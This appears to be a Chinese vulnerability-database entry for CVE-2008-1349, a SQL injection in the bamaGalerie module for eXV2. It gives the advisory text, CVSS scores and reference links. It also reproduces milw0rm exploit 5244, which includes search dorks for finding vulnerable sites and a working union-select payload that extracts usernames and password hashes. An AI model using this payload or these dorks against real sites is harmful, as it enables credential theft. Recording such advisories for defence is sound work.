CVE-2008-1349 |
|
发布时间 :2008-03-17 12:44:00 | ||
修订时间 :2009-03-18 01:35:02 | ||||
NMCOE |
[原文]SQL injection vulnerability in viewcat.php in the bamaGalerie (Bama Galerie) 3.03 and 3.041 module for eXV2 2.0.6 allows remote attackers to execute arbitrary SQL commands via the cid parameter.
[CNNVD]bamaGalerie ‘viewcat.php’ SQL注入漏洞(CNNVD-200803-242)
eXV2 2.0.6 bamaGalerie (Bama Galerie) 3.03和 3.041模块的viewcat.php中存在SQL注入漏洞。远程攻击者通过cid参数来执行任意SQL命令。
–
CVSS (基础分值)
CVSS分值: | 7.5 | [严重(HIGH)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
cpe:/a:exv2:exv2:2.0.6 | |
cpe:/a:exv2:bamagalerie:3.03 | |
cpe:/a:exv2:bamagalerie:3.041 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://www.milw0rm.com/exploits/5340 (UNKNOWN) MILW0RM 5340 |
http://www.milw0rm.com/exploits/5244 (UNKNOWN) MILW0RM 5244 |
http://secunia.com/advisories/29362 (VENDOR_ADVISORY) SECUNIA 29362 |
http://secunia.com/advisories/29359 (VENDOR_ADVISORY) SECUNIA 29359 |
http://packetstormsecurity.org/0804-exploits/runcms11a-sql.txt (UNKNOWN) MISC http://packetstormsecurity.org/0804-exploits/runcms11a-sql.txt |
http://xforce.iss.net/xforce/xfdb/41188 (UNKNOWN) XF bamagalerie-viewcat-sql-injection(41188) |
http://www.securityfocus.com/bid/28229 (UNKNOWN) BID 28229 |
–
漏洞信息
bamaGalerie ‘viewcat.php’ SQL注入漏洞 | |
高危 | SQL注入 |
2008-03-17 00:00:00 | 2009-03-18 00:00:00 |
远程 | |
eXV2 2.0.6 bamaGalerie (Bama Galerie) 3.03和 3.041模块的viewcat.php中存在SQL注入漏洞。远程攻击者通过cid参数来执行任意SQL命令。 |
–
公告与补丁
暂无数据 |
–
漏洞信息 (5244)
eXV2 Module bamaGalerie 3.03 Remote SQL Injection Vulnerability (EDBID:5244) |
|
php | webapps |
2008-03-12 | Verified |
0 | S@BUN |
N/A |
[点击下载] |
########################################## # # eXV2 Module bamaGalerie 3.03 SQL Injection # # download=http://www.exv2-filecenter.de/modules/mydownloads/singlefile.php?lid=9 # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####MAÄ°L : [email protected] # ########################################### # # DORKS 1 : allinurl :"modules/bamagalerie3" # DORKS 2 : allinurl :"modules/bamagalerie" # ########################################### EXPLOIT : viewcat.php?cid=-9999999/**/union/**/select/**/0,1,2,3,concat(uname,0x3a,pass),5,6/**/from/**/e_xoops_users/* ########################################### ##################S@BUN#################### ########################################### #####[email protected]##### ########################################### # milw0rm.com [2008-03-12]
–
漏洞信息
42854 |
|
Bama Galerie Module for eXV2 viewcat.php cid Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
Loss of Confidentiality, Loss of Integrity |
Solution Unknown |
Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
Bama Galerie Module for eXV2 contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'viewcat.php' script not properly sanitizing user-supplied input to the 'cid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database. |
–
时间线
2008-03-12 |
Unknow |
2008-03-12 | Unknow |